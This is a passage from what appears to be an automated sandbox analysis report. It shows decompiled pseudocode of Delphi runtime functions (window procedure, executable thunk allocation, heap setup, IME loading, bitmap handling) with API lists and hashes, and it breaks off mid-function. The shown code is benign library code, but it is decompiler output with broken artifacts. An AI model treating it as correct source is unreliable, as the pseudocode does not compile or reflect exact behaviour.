                                                                            • Opcode Fuzzy Hash: bc21d5101fc51bdf4626e6ca00cb4df6505cc7613c57e159f19c307d06cb48aa
                                                                            • Instruction Fuzzy Hash: 9BE06D71A007108FDB10EE98C8C5A9333D8EB08754F0005A6ED98EF386D374DD908BD4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00455FB4(intOrPtr _a4) {
    long _t27;

    _t27 = DefWindowProcA(*(*((intOrPtr*)(_a4 - 4)) + 0x30), *(*(_a4 - 8)), (*(_a4 - 8))[1], (*(_a4 - 8))[2]); // executed
    (*(_a4 - 8))[3] = _t27;
    return _t27;
}


                                                                            APIs
                                                                            • DefWindowProcA.USER32(?,?,?,?), ref: 00455FDE
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ProcWindow
                                                                            • String ID:
                                                                            • API String ID: 181713994-0
                                                                            • Opcode ID: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8
                                                                            • Instruction ID: a24cf2be33493bd3f548c5cb2912f0d98b4921db6f5013c36e2596895fdb8764
                                                                            • Opcode Fuzzy Hash: feadc97ff837b75b266de6139b99dc6f72c8cfb3ed8b0667b2d15d3104d4f2d8
                                                                            • Instruction Fuzzy Hash: 5DF0C579205608AFCB40DF9DC588D4AFBE9BB4C760B058195B988CB321C234FD80CF90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E00421724(intOrPtr _a4, intOrPtr _a8) {
    void* __ebx;
    void* _t14;
    void _t15;
    void* _t24;
    intOrPtr _t25;
    char* _t26;
    void* _t35;

    if(*0x466304 == 0) {
        // One 4 KiB page: 0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE
        _t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
        _t35 = _t14;
        _t15 = *0x466300; // 0x690000
        *_t35 = _t15;
        _t1 = _t35 + 4; // 0x4
        E00402EFC(0x461bf0, _t24, 2, _t1);
        _t2 = _t35 + 5; // 0x5
        *((intOrPtr*)(_t35 + 6)) = E0042171C(_t2, E004216FC);
        _t4 = _t35 + 0xa; // 0xa
        _t26 = _t4;
        // Fill the page with 13-byte entries, each starting with 0xe8 (x86 CALL rel32),
        // and chain them into a free list headed at 0x466304
        do {
            *_t26 = 0xe8;
            _t5 = _t35 + 4; // 0x4
            *((intOrPtr*)(_t26 + 1)) = E0042171C(_t26, _t5);
            *((intOrPtr*)(_t26 + 5)) = *0x466304;
            *0x466304 = _t26;
            _t26 = _t26 + 0xd;
        } while (_t26 - _t35 < 0xffc);
        *0x466300 = _t35;
    }
    _t25 = *0x466304;
    *0x466304 = *((intOrPtr*)(_t25 + 5));
    *((intOrPtr*)(_t25 + 5)) = _a4;
    *((intOrPtr*)(_t25 + 9)) = _a8;
    return *0x466304;
}


                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00421742
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687
                                                                            • Instruction ID: 827c15edd165ef37d5224862c0752f9a577ccbf913505635d27218b0d4be8635
                                                                            • Opcode Fuzzy Hash: 89e6221551a74eb15f9e48ced21239ad1d285c4e27d512bd12529dafe54f9687
                                                                            • Instruction Fuzzy Hash: EC1148782403159FC710DF19D880B42B7E5EB98790F24C53AE9598B396E3B4E9058BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
E004016C8(signed int __eax) {
    void* _t4;
    intOrPtr _t7;
    signed int _t8;
    void* _t10;
    void** _t15;
    void* _t17;

    _t8 = __eax;
    E0040165C(__eax);
    _t4 = VirtualAlloc(0, 0x140000, 0x1000, 4); // executed
    if(_t4 == 0) {
        *0x463720 = 0;
        return 0;
    } else {
        _t15 = *0x46370c; // 0x25e0000
        _t10 = _t4;
        *_t10 = 0x463708;
        *0x46370c = _t4;
        *(_t10 + 4) = _t15;
        *_t15 = _t4;
        _t17 = _t4 + 0x140000;
        *((intOrPtr*)(_t17 - 4)) = 2;
        *0x463720 = 0x13fff0 - _t8;
        _t7 = _t17 - _t8;
        *0x46371c = _t7;
        *(_t7 - 4) = _t8 | 0x00000002;
        return _t7;
    }
}


                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,00401AFF,?,004020BD), ref: 004016DE
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0
                                                                            • Instruction ID: 2b17dd7dffbc5f012c9b03bba10325585f0ff40c38224672d8caf756a086162d
                                                                            • Opcode Fuzzy Hash: 529b24f2eb1d7a78af4946a119c865930d0c7bde26a066f6f9e42cf2a5f2b5b0
                                                                            • Instruction Fuzzy Hash: C0F037F0B013405BEB09DFBA9D513026AD2E78934AF14C13AE609EB3A8F7B585018B18
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            C-Code - Quality: 83%
E004474DC() {
    int _v8;
    intOrPtr _t4;
    struct HINSTANCE__* _t11;
    struct HINSTANCE__* _t13;
    struct HINSTANCE__* _t15;
    struct HINSTANCE__* _t17;
    struct HINSTANCE__* _t19;
    struct HINSTANCE__* _t21;
    struct HINSTANCE__* _t23;
    struct HINSTANCE__* _t25;
    struct HINSTANCE__* _t27;
    struct HINSTANCE__* _t29;
    intOrPtr _t40;
    intOrPtr _t42;
    intOrPtr _t44;

    _t42 = _t44;
    _t4 = *0x462f3c; // 0x4658c8
    if(*((char*)(_t4 + 0xc)) == 0) {
        return _t4;
    } else {
        _v8 = SetErrorMode(0x8000);
        _push(_t42);
        _push(0x447642);
        _push(*[fs:eax]);
        *[fs:eax] = _t44;
        if(*0x466548 == 0) {
            *0x466548 = GetProcAddress(GetModuleHandleA("USER32"), "WINNLSEnableIME");
        }
        if(*0x46268c == 0) {
            *0x46268c = LoadLibraryA("imm32.dll");
            if(*0x46268c != 0) {
                _t11 = *0x46268c; // 0x0
                *0x46654c = GetProcAddress(_t11, "ImmGetContext");
                _t13 = *0x46268c; // 0x0
                *0x466550 = GetProcAddress(_t13, "ImmReleaseContext");
                _t15 = *0x46268c; // 0x0
                *0x466554 = GetProcAddress(_t15, "ImmGetConversionStatus");
                _t17 = *0x46268c; // 0x0
                *0x466558 = GetProcAddress(_t17, "ImmSetConversionStatus");
                _t19 = *0x46268c; // 0x0
                *0x46655c = GetProcAddress(_t19, "ImmSetOpenStatus");
                _t21 = *0x46268c; // 0x0
                *0x466560 = GetProcAddress(_t21, "ImmSetCompositionWindow");
                _t23 = *0x46268c; // 0x0
                *0x466564 = GetProcAddress(_t23, "ImmSetCompositionFontA");
                _t25 = *0x46268c; // 0x0
                *0x466568 = GetProcAddress(_t25, "ImmGetCompositionStringA");
                _t27 = *0x46268c; // 0x0
                *0x46656c = GetProcAddress(_t27, "ImmIsIME");
                _t29 = *0x46268c; // 0x0
                *0x466570 = GetProcAddress(_t29, "ImmNotifyIME");
            }
        }
        _pop(_t40);
        *[fs:eax] = _t40;
        _push(0x447649);
        return SetErrorMode(_v8);
    }
}


                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00008000), ref: 004474F5
                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00447642,?,00008000), ref: 00447519
                                                                            • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00447526
                                                                            • LoadLibraryA.KERNEL32(imm32.dll,00000000,00447642,?,00008000), ref: 00447542
                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00447564
                                                                            • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00447579
                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044758E
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004475A3
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004475B8
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004475CD
                                                                            • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004475E2
                                                                            • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004475F7
                                                                            • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044760C
                                                                            • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00447621
                                                                            • SetErrorMode.KERNEL32(?,00447649,00008000), ref: 0044763C
                                                                            Strings
                                                                            • ImmSetConversionStatus , xrefs: 00447598
                                                                            • ImmIsIME , xrefs: 00447601
                                                                            • ImmReleaseContext , xrefs: 0044756E
                                                                            • ImmNotifyIME , xrefs: 00447616
                                                                            • USER32 , xrefs: 00447514
                                                                            • ImmGetCompositionStringA , xrefs: 004475EC
                                                                            • WINNLSEnableIME , xrefs: 00447520
                                                                            • ImmSetOpenStatus , xrefs: 004475AD
                                                                            • ImmGetContext , xrefs: 00447559
                                                                            • ImmGetConversionStatus , xrefs: 00447583
                                                                            • ImmSetCompositionWindow , xrefs: 004475C2
                                                                            • imm32.dll , xrefs: 0044753D
                                                                            • ImmSetCompositionFontA , xrefs: 004475D7
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                            • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                            • API String ID: 3397921170-3950384806
                                                                            • Opcode ID: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98
                                                                            • Instruction ID: e70fe7214d08f84b75ceb215c1bd47e4ba2206317c64f215ae3433f6c64e5f95
                                                                            • Opcode Fuzzy Hash: 85cd7dde39b5c599270180dfbc2611d832bb0dc38289b90c796d1fbcd3152a98
                                                                            • Instruction Fuzzy Hash: 16314CF0644B10BFEB04EB69ED06A153BA9A304314713463AF102D72A0E7FD6811CB2E
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 72%
E00428690(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
    struct HBITMAP__* _v8;
    struct HPALETTE__* _v12;
    struct HPALETTE__* _v16;
    struct HPALETTE__* _v20;
    void* _v24;
    struct HDC__* _v28;
    struct HDC__* _v32;
    struct HDC__* _v36;
    BITMAPINFO* _v40;
    void* _v44;
    intOrPtr _v48;
    struct tagRGBQUAD _v52;
    struct HPALETTE__* _v56;
    intOrPtr _v116;
    intOrPtr _v120;
    intOrPtr _v132;
    intOrPtr _v136;
    void _v140;
    struct tagRECT _v156;
    void* __ebx;
    void* __ebp;
    signed int _t229;
    int _t280;
    signed int _t289;
    signed short _t291;
    struct HBRUSH__* _t365;
    struct HPALETTE__* _t421;
    signed int _t440;
    intOrPtr _t441;
    intOrPtr _t443;
    intOrPtr _t444;
    void* _t454;
    void* _t456;
    void* _t458;
    intOrPtr _t459;

    _t456 = _t458;
    _t459 = _t458 + 0xffffff68;
    _push(_t418);
    _v16 = __ecx;
    _v12 = __edx;
    _v8 = __eax;
    _v20 = 0;
    if(*(_a8 + 0x18) == 0 || *(_a8 + 0x1c) != 0 && *(_a8 + 0x20) != 0) {
        if(*(_a8 + 0x18) != 0 || *(_a8 + 4) != 0 && *(_a8 + 8) != 0) {
            E0042824C(_v8);
            _v116 = 0;
            if(_v8 != 0 && GetObjectA(_v8, 0x54, &_v140) < 0x18) {
                E00426B00();
            }
            _v28 = E00426C14(GetDC(0));
            _v32 = E00426C14(CreateCompatibleDC(_v28));
            _push(_t456);
            _push(0x428cde);
            _push(*[fs:edx]);
            *[fs:edx] = _t459;
            if(*(_a8 + 0x18) >= 0x28) {
                _v40 = E00402D0C(0x42c);
                _push(_t456);
                _push(0x4289e8);
                _push(*[fs:edx]);
                *[fs:edx] = _t459;
                *(_a8 + 0x18) = 0x28;
                *((short*)(_a8 + 0x24)) = 1;
                if(*(_a8 + 0x26) == 0) {
                    _t289 = GetDeviceCaps(_v28, 0xc);
                    _t291 = GetDeviceCaps(_v28, 0xe);
                    _t418 = _t289 * _t291;
                    *(_a8 + 0x26) = _t289 * _t291;
                }
                memcpy(_v40, _a8 + 0x18, 0xa << 2);
                *(_a8 + 4) = *(_a8 + 0x1c);
                _t440 = _a8;
                *(_t440 + 8) = *(_a8 + 0x20);
                if(*(_a8 + 0x26) > 8) {
                    _t229 = *(_a8 + 0x26) & 0x0000ffff;
                    if(_t229 == 0x10) {
                        L30:
                        if((*(_a8 + 0x28) & 0x00000003) != 0) {
                            E00428644(_a8);
                            _t104 = &(_v40->bmiColors); // 0x29
                            _t440 = _t104;
                            E00402EFC(_a8 + 0x40, _t418, 0xc, _t440);
                        }
                    } else {
                        _t440 = _a8;
                        if(_t229 == 0x20) {
                            goto L30;
                        }
                    }
                } else {
                    if(*(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
                        if(_v16 == 0) {
                            if(_v8 != 0) {
                                _v24 = SelectObject(_v32, _v8);
                                if(_v116 <= 0 || _v120 == 0) {
                                    asm("cdq");
                                    GetDIBits(_v32, _v8, 0, (*(_a8 + 0x20) ^ _t440) - _t440, 0, _v40, 0);
                                } else {
                                    _t280 = GetDIBColorTable(_v32, 0, 0x100, &(_v40->bmiColors));
                                    _t440 = _a8;
                                    *(_t440 + 0x38) = _t280;
                                }
                                SelectObject(_v32, _v24);
                            }
                        } else {
                            _t76 = &(_v40->bmiColors); // 0x29
                            _t440 = _t76;
                            E004273B0(_v16, 0xff, _t440);
                        }
                    } else {
                        _t440 = 0;
                        _v40->bmiColors = 0;
                        *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
                    }
                }
                _v20 = E00426C14(CreateDIBSection(_v28, _v40, 0, &_v44, 0, 0));
                if(_v44 == 0) {
                    E00426B6C(_t418);
                }
                if(_v8 == 0 || *(_a8 + 0x1c) != _v136 || *(_a8 + 0x20) != _v132 || *(_a8 + 0x26) <= 8) {
                    _pop(_t441);
                    *[fs:eax] = _t441;
                    _push(0x4289ef);
                    return E00402D28(_v40);
                } else {
                    asm("cdq");
                    GetDIBits(_v32, _v8, 0, (*(_a8 + 0x20) ^ _t440) - _t440, _v44, _v40, 0);
                    E00404230();
                    E00404230();
                    goto L58;
                }
            } else {
                if((*(_a8 + 0x10) & 0x0000ffff | *(_a8 + 0x12)) != 1) {
                    _v20 = E00426C14(CreateCompatibleBitmap(_v28, *(_a8 + 4), *(_a8 + 8)));
                } else {
                    _v20 = E00426C14(CreateBitmap(*(_a8 + 4), *(_a8 + 8), 1, 1, 0));
                }
                E00426C14(_v20);
                _v24 = E00426C14(SelectObject(_v32, _v20));
                _push(_t456);
                _push(0x428c8f);
                _push(*[fs:eax]);
                *[fs:eax] = _t459;
                _push(_t456);
                _push(0x428c7e);
                _push(*[fs:eax]);
                *[fs:eax] = _t459;
                _v56 = 0;
                _t421 = 0;
                if(_v16 != 0) {
                    _v56 = SelectPalette(_v32, _v16, 0);
                    RealizePalette(_v32);
                }
                _push(_t456);
                _push(0x428c5c);
                _push(*[fs:eax]);
                *[fs:eax] = _t459;
                if(_a4 == 0) {
                    PatBlt(_v32, 0, 0, *(_a8 + 4), *(_a8 + 8), 0xff0062);
                } else {
                    _t365 = E004261BC(*((intOrPtr*)(_a4 + 0x14)));
                    E004193B4(0, *(_a8 + 4), 0, &_v156, *(_a8 + 8));
                    FillRect(_v32, &_v156, _t365);
                    SetTextColor(_v32, E00425400(*((intOrPtr*)(*((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                    SetBkColor(_v32, E00425400(E00426180(*((intOrPtr*)(_a4 + 0x14)))));
                    if(*(_a8 + 0x26) == 1 && *((intOrPtr*)(_a8 + 0x14)) != 0) {
                        _v52 = E00425400(*((intOrPtr*)(*((intOrPtr*)(_a4 + 0xc)) + 0x18)));
                        _v48 = E00425400(E00426180(*((intOrPtr*)(_a4 + 0x14))));
                        SetDIBColorTable(_v32, 0, "true", &_v52);
                    }
                }
                if(_v8 == 0) {
                    _pop(_t443);
                    *[fs:eax] = _t443;
                    _push(0x428c63);
                    if(_v16 != 0) {
                        return SelectPalette(_v32, _v56, 0xffffffff);
                    }
                    return 0;
                } else {
                    _v36 = E00426C14(CreateCompatibleDC(_v28));
                    _push(_t456);
                    _push(0x428c32);
                    _push(*[fs:eax]);
                    *[fs:eax] = _t459;
                    _t454 = E00426C14(SelectObject(_v36, _v8));
                    if(_v12 != 0) {
                        _t421 = SelectPalette(_v36, _v12, 0);
                        RealizePalette(_v36);
                    }
                    if(_a4 != 0) {
                        SetTextColor(_v36, E00425400(*((intOrPtr*)(*((intOrPtr*)(_a4 + 0xc)) + 0x18))));
                        SetBkColor(_v36, E00425400(E00426180(*((intOrPtr*)(_a4 + 0x14)))));
                    }
                    BitBlt(_v32, 0, 0, *(_a8 + 4), *(_a8 + 8), _v36, 0, 0, 0xcc0020);
                    if(_v12 != 0) {
                        SelectPalette(_v36, _t421, 0xffffffff);
                    }
                    E00426C14(SelectObject(_v36, _t454));
                    _pop(_t444);
                    *[fs:eax] = _t444;
                    _push(0x428c39);
                    return DeleteDC(_v36);
                }
            }
        } else {
            goto L58;
        }
    } else {
        L58:
        return _v20;
    }
}

                                                                            0x00428788
                                                                            0x004289f2
                                                                            0x00428a09
                                                                            0x00428a0e
                                                                            0x00428a0f
                                                                            0x00428a14
                                                                            0x00428a17
                                                                            0x00428a1c
                                                                            0x00428a1d
                                                                            0x00428a22
                                                                            0x00428a25
                                                                            0x00428a2a
                                                                            0x00428a2d
                                                                            0x00428a33
                                                                            0x00428a44
                                                                            0x00428a4b
                                                                            0x00428a4b
                                                                            0x00428a52
                                                                            0x00428a53
                                                                            0x00428a58
                                                                            0x00428a5b
                                                                            0x00428a62
                                                                            0x00428b38
                                                                            0x00428a68
                                                                            0x00428a6e
                                                                            0x00428a8c
                                                                            0x00428a9c
                                                                            0x00428ab4
                                                                            0x00428ace
                                                                            0x00428adb
                                                                            0x00428af4
                                                                            0x00428b07
                                                                            0x00428b16
                                                                            0x00428b16
                                                                            0x00428adb
                                                                            0x00428b41
                                                                            0x00428c3b
                                                                            0x00428c3e
                                                                            0x00428c41
                                                                            0x00428c4a
                                                                            0x00000000
                                                                            0x00428c56
                                                                            0x00428c5b
                                                                            0x00428b47
                                                                            0x00428b55
                                                                            0x00428b5a
                                                                            0x00428b5b
                                                                            0x00428b60
                                                                            0x00428b63
                                                                            0x00428b78
                                                                            0x00428b7e
                                                                            0x00428b8f
                                                                            0x00428b95
                                                                            0x00428b95
                                                                            0x00428b9e
                                                                            0x00428bb3
                                                                            0x00428bcd
                                                                            0x00428bcd
                                                                            0x00428bf5
                                                                            0x00428bfe
                                                                            0x00428c07
                                                                            0x00428c07
                                                                            0x00428c16
                                                                            0x00428c1d
                                                                            0x00428c20
                                                                            0x00428c23
                                                                            0x00428c31
                                                                            0x00428c31
                                                                            0x00428b41
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00428ce5
                                                                            0x00428ce5
                                                                            0x00428cee
                                                                            0x00428cee

                                                                            APIs
                                                                            • GetObjectA.GDI32(00000000,00000054,?), ref: 00428710
                                                                            • GetDC.USER32(00000000), ref: 00428721
                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00428732
                                                                            • CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 0042877E
                                                                            • CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 004287A2
                                                                            • SelectObject.GDI32(?,?), ref: 004289FF
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 00428A3F
                                                                            • RealizePalette.GDI32(?), ref: 00428A4B
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00428AB4
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00428ACE
                                                                            • SetDIBColorTable.GDI32(?,00000000,?,?,?,00000000,?,00000000,?,?,00000000,00000000,00428C5C,?,00000000,00428C7E), ref: 00428B16
                                                                            • FillRect.USER32 ref: 00428A9C
                                                                              • Part of subcall function 00425400: GetSysColor.USER32(E8C38BD6), ref: 0042540A
                                                                            • PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 00428B38
                                                                            • CreateCompatibleDC.GDI32(00000028), ref: 00428B4B
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428B6E
                                                                            • SelectPalette.GDI32(?,00000000,00000000), ref: 00428B8A
                                                                            • RealizePalette.GDI32(?), ref: 00428B95
                                                                            • SetTextColor.GDI32(?,00000000), ref: 00428BB3
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00428BCD
                                                                            • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00428BF5
                                                                            • SelectPalette.GDI32(?,00000000,000000FF), ref: 00428C07
                                                                            • SelectObject.GDI32(?,00000000), ref: 00428C11
                                                                            • DeleteDC.GDI32(?), ref: 00428C2C
                                                                              • Part of subcall function 004261BC: CreateBrushIndirect.GDI32(?), ref: 00426267
                                                                            Memory Dump Source
                                                                            • Source File: 00000006.00000002.334161583.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000006.00000002.334148520.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334267038.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334281661.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 00000006.00000002.334295803.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: ColorSelect$CreatePalette$Object$Compatible$BitmapRealizeText$BrushDeleteFillIndirectRectTable
                                                                            • String ID:
                                                                            • API String ID: 1299887459-0
                                                                            • Opcode ID: 2bdc4c12e107cc10b8fc08af10309e4e60e6e52fb233a139e0a985037b79f6f3
                                                                            • Instruction ID: c94ec9aa21864ceb033ab26dba9ef5c179889cf4e7f392713ca4c39ad77ba447
                                                                            • Opcode Fuzzy Hash: 2bdc4c12e107cc10b8fc08af10309e4e60e6e52fb233a139e0a985037b79f6f3
                                                                            • Instruction Fuzzy Hash: 8C12DB71B01218AFDB10EF99D985F9E77B8EB08314F51845AF914EB291C778ED80CB68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 84%
                                                                                                                                  E00452B78(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) { 				intOrPtr* _v8; 				char _v12; 				intOrPtr _t157; 				intOrPtr _t161; 				intOrPtr _t163; 				intOrPtr _t164; 				intOrPtr _t165; 				intOrPtr _t169; 				intOrPtr _t174; 				intOrPtr _t176; 				intOrPtr _t177; 				void* _t179; 				struct HWND__* _t180; 				long _t190; 				long _t241; 				intOrPtr _t247; 				int _t252; 				intOrPtr _t253; 				intOrPtr _t266; 				intOrPtr _t270; 				signed int _t276; 				intOrPtr _t277; 				intOrPtr _t290; 				intOrPtr _t294; 				intOrPtr _t298; 				intOrPtr _t299; 				void* _t307; 				void* _t309; 				intOrPtr _t316; 				signed int _t326; 				signed int _t327; 				void* _t329; 				long _t333; 				intOrPtr _t337; 				struct HWND__* _t342; 				signed int _t344; 				signed int _t345; 				signed int _t348; 				signed int _t350; 				long _t351; 				signed int _t354; 				signed int _t356; 				signed int _t357; 				void* _t359; 				intOrPtr _t373; 				signed int _t389; 				signed int _t390; 				intOrPtr _t391; 				signed int _t400; 				signed int _t401; 				signed int _t403; 				signed int _t405; 				long _t406; 				signed int _t408; 				long _t409; 				signed int _t411; 				signed int _t412; 				void* _t414; 				void* _t415; 				intOrPtr _t416;  				_t414 = _t415; 				_t416 = _t415 + 0xfffffff8; 				_v12 = 0; 				_v8 = __eax; 				_push(_t414); 				_push(0x453183); 				_push( *[fs:eax]); 				 *[fs:eax] = _t416; 				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x358) & 0x00000004) != 0) { 					_t337 =  *0x462f24; // 0x423578 					E00406740(_t337,  &_v12); 					E0040C11C(_v12, 1); 					E00404184(); 				} 				_t157 =  *0x466580; // 0x26df470 				E00457AB0(_t157); 				 *(_v8 + 0x358) =  *(_v8 + 0x358) | 0x00000004; 				_push(_t414); 				_push(0x453166); 				_push( *[fs:edx]); 				 *[fs:edx] = _t416; 				if(( *(_v8 + 0x1c) & 0x00000010) != 
0) { 					_t161 = _v8; 					__eflags =  *(_t161 + 0x1c) & 0x00000010; 					if(( *(_t161 + 0x1c) & 0x00000010) != 0) { 						_t164 = _v8; 						__eflags =  *(_t164 + 0x30); 						if( *(_t164 + 0x30) != 0) { 							_t165 = _v8; 							__eflags =  *((char*)(_t165 + 0x1da)); 							if( *((char*)(_t165 + 0x1da)) != 0) { 								ShowWindow(E004423F8(_v8), 1); 							} 						} 					} 					L82: 					_pop(_t373); 					 *[fs:eax] = _t373; 					_push(0x45316d); 					_t163 = _v8; 					 *(_t163 + 0x358) =  *(_t163 + 0x358) & 0x000000fb; 					return _t163; 				} 				_t169 = _v8; 				_t420 =  *((char*)(_t169 + 0x1da)); 				if( *((char*)(_t169 + 0x1da)) == 0) { 					_push(_t414); 					_push(0x453037); 					_push( *[fs:eax]); 					 *[fs:eax] = _t416; 					E00403B24(_v8, __eflags); 					 *[fs:eax] = 0; 					_t174 =  *0x466584; // 0x26e66a0 					__eflags =  *((intOrPtr*)(_t174 + 0x6c)) - _v8; 					if( *((intOrPtr*)(_t174 + 0x6c)) == _v8) { 						__eflags = 0; 						E00451B54(_v8, 0); 					} 					_t176 = _v8; 					__eflags =  *((char*)(_t176 + 0x277)) - 1; 					if( *((char*)(_t176 + 0x277)) != 1) { 						_t177 = _v8; 						__eflags =  *(_t177 + 0x358) & 0x00000008; 						if(( *(_t177 + 0x358) & 0x00000008) == 0) { 							_t342 = 0; 							_t179 = E004423F8(_v8); 							_t180 = GetActiveWindow(); 							__eflags = _t179 - _t180; 							if(_t179 == _t180) { 								_t190 = IsIconic(E004423F8(_v8)); 								__eflags = _t190; 								if(_t190 == 0) { 									_t342 = E0044CB68(E004423F8(_v8)); 								} 							} 							__eflags = _t342; 							if(_t342 == 0) { 								ShowWindow(E004423F8(_v8), 0); 							} else { 								SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97); 								SetActiveWindow(_t342); 							} 						} else { 							SetWindowPos(E004423F8(_v8), 0, 0, 0, 0, 0, 0x97); 						} 					} else { 						 *((intOrPtr*)( *_v8 + 0xb0))(); 					} 					goto L82; 				} 				_push(_t414); 				_push(0x452c30); 				_push( *[fs:eax]); 				 *[fs:eax] = _t416; 				E00403B24(_v8, _t420); 				 
